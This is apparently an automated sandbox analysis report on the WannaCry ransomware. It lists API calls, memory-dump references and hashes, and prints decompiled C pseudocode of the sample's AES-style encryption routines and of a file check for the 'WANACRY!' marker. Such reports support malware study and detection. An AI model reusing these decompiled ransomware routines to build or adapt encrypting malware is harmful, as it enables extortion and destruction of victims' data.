                0x00402c2d
                0x00402c2e
                0x00402c36
                0x00402c3f
                0x00402c43
                0x00402c45
                0x00402c46
                0x00402c49
                0x00402c49
                0x00402c49
                0x00000000
                0x00402c27
                0x00402bd9
                0x00402bdf
                0x00402bdf
                0x00402be4
                0x00402bea
                0x00402bea
                0x00402bea
                0x00402bec
                0x00402bed
                0x00402bf0
                0x00000000
                0x00402bdf
                0x00402bb3
                0x00402bb6
                0x00402bb6
                0x00402bbb
                0x00402bc1
                0x00402bc1
                0x00402bc1
                0x00402bc3
                0x00402bc4
                0x00402bc7
                0x00000000
                0x00402bb6
                0x00402b55
                0x00000000
                0x00402b55

                APIs
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ??0exception@@ExceptionThrow$memcpy
                • String ID:
                • API String ID: 1881450474-3916222277
                • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004014A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178filememoryCOMMON
                Download Yara Rule
                APIs
                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                • String ID: WANACRY!
                • API String ID: 283026544-1240840912
                • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 55%
                			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E00402E7E(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x28;
					do {
						if(_t274 > 0) {
							_t34 =  &_v28; // 0x403b51
							_t260 =  *_t34;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_t100 =  &_v28; // 0x403b51
					_v44 =  *_t100 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                0x00403517
                0x0040351e
                0x00403528
                0x00403531
                0x00403536
                0x00403537
                0x00403537
                0x0040353c
                0x00403545
                0x00000000
                0x0040354f
                0x0040355b
                0x0040355c
                0x0040355d
                0x0040355f
                0x0040356e
                0x00403572
                0x0040357d
                0x0040358c
                0x0040358f
                0x00403592
                0x00403598
                0x0040359d
                0x004035a0
                0x004035a3
                0x004035a6
                0x004035ac
                0x004035ad
                0x004035b5
                0x004035be
                0x004035bf
                0x004035c4
                0x004035c9
                0x004035cd
                0x004035d0
                0x004035d3
                0x004035d5
                0x004035d5
                0x004035d5
                0x004035a6
                0x004035dc
                0x004035e3
                0x004035e6
                0x004035ef
                0x004035f2
                0x004035f4
                0x004035fd
                0x004035fd
                0x00403600
                0x00403608
                0x0040360b
                0x00403613
                0x00403619
                0x0040361c
                0x0040361f
                0x00403627
                0x0040363a
                0x0040363d
                0x00403660
                0x00403682
                0x00403688
                0x0040368a
                0x0040368d
                0x00403690
                0x00403690
                0x00403690
                0x0040361f
                0x004036a9
                0x004036ae
                0x004036b2
                0x004036b5
                0x004036b8
                0x004036bb
                0x004035f2
                0x004036c7
                0x004036cd
                0x004036d3
                0x004036d6
                0x004036df
                0x004036e2
                0x004036e7
                0x004036ef
                0x004036f2
                0x00403701
                0x00403709
                0x0040371f
                0x00403726
                0x00403727
                0x00403741
                0x00403745
                0x0040374a
                0x00403760
                0x00403767
                0x00403768
                0x0040377d
                0x00403780
                0x00403782
                0x00403783
                0x00403786
                0x00403787
                0x004036f2
                0x00403794

                APIs
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ??0exception@@ExceptionThrowmemcpy
                • String ID: $Q;@
                • API String ID: 2382887404-262343263
                • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 54%
                			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E004031BC(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 0x1e8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x208;
					do {
						if(_t274 > 0) {
							_t260 = _v28;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_v44 = _v28 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                0x0040379f
                0x004037a6
                0x004037b0
                0x004037b9
                0x004037be
                0x004037bf
                0x004037bf
                0x004037c4
                0x004037cd
                0x00000000
                0x004037d7
                0x004037e3
                0x004037e4
                0x004037e5
                0x004037e7
                0x004037f6
                0x004037fa
                0x00403805
                0x00403814
                0x00403817
                0x0040381a
                0x00403820
                0x00403828
                0x0040382b
                0x0040382e
                0x00403831
                0x00403837
                0x00403838
                0x00403840
                0x00403849
                0x0040384a
                0x0040384f
                0x00403854
                0x00403858
                0x0040385b
                0x0040385e
                0x00403860
                0x00403860
                0x00403860
                0x00403831
                0x00403867
                0x0040386e
                0x00403871
                0x0040387d
                0x00403880
                0x00403882
                0x0040388b
                0x0040388e
                0x00403896
                0x00403899
                0x004038a1
                0x004038a7
                0x004038aa
                0x004038ad
                0x004038b5
                0x004038c8
                0x004038cb
                0x004038ee
                0x00403910
                0x00403916
                0x00403918
                0x0040391b
                0x0040391e
                0x0040391e
                0x0040391e
                0x004038ad
                0x00403937
                0x0040393c
                0x00403940
                0x00403943
                0x00403946
                0x00403949
                0x00403880
                0x00403955
                0x0040395b
                0x00403961
                0x00403964
                0x0040396d
                0x00403975
                0x0040397d
                0x00403980
                0x0040398f
                0x0040399a
                0x004039b0
                0x004039b7
                0x004039b8
                0x004039d2
                0x004039d6
                0x004039db
                0x004039f1
                0x004039f8
                0x004039f9
                0x00403a0e
                0x00403a11
                0x00403a13
                0x00403a14
                0x00403a17
                0x00403a18
                0x00403980
                0x00403a25

                APIs
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ??0exception@@ExceptionThrowmemcpy
                • String ID:
                • API String ID: 2382887404-3916222277
                • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004029CC(void* _a4) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t35;
				void* _t37;

				_t37 = _a4;
				if(_t37 != 0) {
					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
						_t25 =  *((intOrPtr*)(_t37 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
					}
					if( *(_t37 + 8) == 0) {
						L9:
						_t18 =  *((intOrPtr*)(_t37 + 4));
						if(_t18 != 0) {
							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
						}
						return HeapFree(GetProcessHeap(), 0, _t37);
					} else {
						_t35 = 0;
						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
							L8:
							free( *(_t37 + 8));
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
							if(_t23 != 0) {
								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
							}
							_t35 = _t35 + 1;
						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
						goto L8;
					}
				}
				return _t17;
			}









                0x004029ce
                0x004029d6
                0x004029db
                0x004029df
                0x004029ea
                0x004029ea
                0x004029ef
                0x00402a1d
                0x00402a1d
                0x00402a22
                0x00402a2e
                0x00402a31
                0x00000000
                0x004029f1
                0x004029f2
                0x004029f7
                0x00402a12
                0x00402a15
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004029f9
                0x004029f9
                0x004029fc
                0x00402a01
                0x00402a07
                0x00402a0b
                0x00402a0c
                0x00402a0d
                0x00000000
                0x004029f9
                0x004029ef
                0x00402a45

                APIs
                • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Heap$FreeProcessfree
                • String ID:
                • API String ID: 3428986607-0
                • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402E7E Relevance: 3.3, APIs: 2, Instructions: 272COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 34%
                			E00402E7E(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v44;
				signed char* _t151;
				signed char* _t154;
				signed char* _t155;
				signed char* _t158;
				signed char* _t159;
				signed char* _t160;
				signed char* _t162;
				signed int _t166;
				signed int _t167;
				signed char* _t172;
				signed int* _t245;
				signed int _t262;
				signed int _t263;
				signed int _t278;
				signed int _t279;
				signed int _t289;
				signed int _t303;
				intOrPtr _t344;
				void* _t345;
				signed int _t346;

				_t344 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v44);
					L0040776E();
				}
				_t151 = _a4;
				_t154 =  &(_t151[3]);
				_t155 =  &(_t154[1]);
				_t278 = (( *_t151 & 0x000000ff) << 0x00000018 | (_t151[1] & 0x000000ff) << 0x00000010 |  *_t154 & 0x000000ff) ^  *(_t344 + 8);
				_v20 = _t278;
				_t158 =  &(_t155[3]);
				_t159 =  &(_t158[1]);
				_t160 =  &(_t159[1]);
				_v16 = ((_t154[1] & 0x000000ff) << 0x00000018 | (_t155[1] & 0x000000ff) << 0x00000010 |  *_t158 & 0x000000ff) ^  *(_t344 + 0xc);
				_t162 =  &(_t160[2]);
				_t163 =  &(_t162[1]);
				_t262 = (( *_t159 & 0x000000ff) << 0x00000018 | ( *_t160 & 0x000000ff) << 0x00000010 |  *_t162 & 0x000000ff) ^  *(_t344 + 0x10);
				_v24 = _t262;
				_t166 =  *(_t344 + 0x410);
				_v28 = _t166;
				_v12 = ((_t162[1] & 0x000000ff) << 0x00000018 | (_t163[1] & 0x000000ff) << 0x00000010) ^  *(_t344 + 0x14);
				if(_t166 > 1) {
					_a4 = _t344 + 0x30;
					_v8 = _t166 - 1;
					do {
						_t245 =  &(_a4[8]);
						_a4 = _t245;
						_v24 =  *0x00408FFC ^  *0x00408BFC ^  *0x004093FC ^  *(0x4097fc + (_v16 & 0x000000ff) * 4) ^  *_a4;
						_v16 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_t278 & 0x000000ff) * 4) ^  *(_a4 - 4);
						_v12 =  *0x00408BFC ^  *0x004093FC ^  *0x00408FFC ^  *(0x4097fc + (_t262 & 0x000000ff) * 4) ^  *(_t245 - 0x1c);
						_t262 = _v24;
						_v24 = _t262;
						_t278 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_v12 & 0x000000ff) * 4) ^  *(_t245 - 0x28);
						_t80 =  &_v8;
						 *_t80 = _v8 - 1;
						_v20 = _t278;
					} while ( *_t80 != 0);
					_t166 = _v28;
					_t344 = _v32;
				}
				_t167 = _t166 << 5;
				_t86 = _t344 + 8; // 0x8bf9f759
				_t279 =  *(_t167 + _t86);
				_t88 = _t344 + 8; // 0x40355c
				_t345 = _t167 + _t88;
				_v8 = _t279;
				_t172 = _a8;
				 *_t172 =  *0x004089FC ^ _t279 >> 0x00000018;
				_t172[1] =  *0x004089FC ^ _t279 >> 0x00000010;
				_t97 = _t262 + 0x4089fc; // 0x6bf27b77
				_t172[2] =  *_t97 ^ _v8 >> 0x00000008;
				_t172[3] =  *((_v12 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t104 = _t345 + 4; // 0x33c12bf8
				_t289 =  *_t104;
				_v8 = _t289;
				_t172[4] =  *0x004089FC ^ _t289 >> 0x00000018;
				_t172[5] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[6] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t172[7] =  *((_v20 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t121 = _t345 + 8; // 0x6ff83c9
				_t303 =  *_t121;
				_v8 = _t303;
				_t172[8] =  *0x004089FC ^ _t303 >> 0x00000018;
				_t172[9] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[0xa] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t263 = _t262 & 0x000000ff;
				_t172[0xb] =  *((_v16 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t137 = _t345 + 0xc; // 0x41c1950f
				_t346 =  *_t137;
				_v8 = _t346;
				_t172[0xc] =  *0x004089FC ^ _t346 >> 0x00000018;
				_t172[0xd] =  *0x004089FC ^ _t346 >> 0x00000010;
				_t172[0xe] =  *0x004089FC ^ _t346 >> 0x00000008;
				_t148 = _t263 + 0x4089fc; // 0x6bf27b77
				_t172[0xf] =  *_t148 ^ _v8;
				return _t172;
			}










































                0x00402e85
                0x00402e87
                0x00402e8e
                0x00402e98
                0x00402ea1
                0x00402ea6
                0x00402ea7
                0x00402ea7
                0x00402eac
                0x00402eca
                0x00402ed4
                0x00402ed5
                0x00402ee0
                0x00402eef
                0x00402ef5
                0x00402eff
                0x00402f00
                0x00402f11
                0x00402f17
                0x00402f18
                0x00402f26
                0x00402f36
                0x00402f3e
                0x00402f4c
                0x00402f4f
                0x00402f59
                0x00402f5c
                0x00402f5f
                0x00402fbf
                0x00402fcc
                0x00402fd6
                0x00403016
                0x00403031
                0x0040303b
                0x0040303e
                0x00403041
                0x00403044
                0x00403044
                0x00403047
                0x00403047
                0x00403050
                0x00403053
                0x00403053
                0x00403056
                0x00403059
                0x00403059
                0x0040305d
                0x0040305d
                0x00403068
                0x00403078
                0x0040307b
                0x0040308f
                0x0040309a
                0x004030a4
                0x004030b8
                0x004030bb
                0x004030bb
                0x004030c4
                0x004030d1
                0x004030e5
                0x004030fa
                0x0040310e
                0x00403111
                0x00403111
                0x0040311a
                0x00403127
                0x0040313b
                0x0040314e
                0x00403154
                0x00403162
                0x00403165
                0x00403165
                0x0040316f
                0x0040317f
                0x00403194
                0x004031a8
                0x004031ab
                0x004031b5
                0x004031b9

                APIs
                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402E98
                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402EA7
                Memory Dump Source
